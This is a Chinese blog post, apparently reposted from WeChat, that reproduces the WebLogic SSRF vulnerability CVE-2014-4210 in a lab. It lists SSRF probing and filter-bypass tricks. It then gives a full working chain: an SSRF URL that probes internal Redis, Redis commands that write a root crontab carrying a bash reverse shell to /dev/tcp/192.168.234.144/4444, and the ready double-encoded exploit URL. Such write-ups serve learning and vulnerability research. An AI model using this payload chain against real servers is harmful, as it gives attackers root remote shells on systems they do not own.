最近在学习SSRF相关知识,本次复现的是Weblogic的SSRF 漏洞,配合redis通过计划任务写shell。正文之前感觉总结一下今天学到的SSRF玩法,首先是通过file协议探测内网主机文件,然后是通过http://或者dict://去探测内网内其他主机端口开放情况,或者CMS信息,然后是可以通过模拟提交请求,或者上传文件。(请求时要根据次数进行url编码,第一次要在%0A前加上%0D),最后提一嘴bypass,如果指定必须从哪里请求过来可以使用类似http://[email protected],如果对127有所过滤又可以用八进制,十进制,十六进制或者localhost进行绕过。。。。
靶机:192.168.234.142 攻击机:192.168.234.144
1.首先探测到6379的redis数据库端口开着
http://192.168.234.142:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.20.0.2:6379/
2.通过redis计划任务反弹shell
set 1 "nnnn* * * * * root bash -c 'sh -i >& /dev/tcp/192.168.234.144/4444 0>&1'nnnn"
config set dir /etc/
config set dbfilename crontab
save
Payload需要去url编码两次,第一次要将%0A前都加上%0D
http://192.168.234.142:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.20.0.2:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.234.144%2F4444%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa%0D%0A
3. 攻击机起好监听,拿到权限。
原文始发于微信公众号(飞奔的狸花猫):复现Weblogic SSRF 漏洞(CVE-2014-4210)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论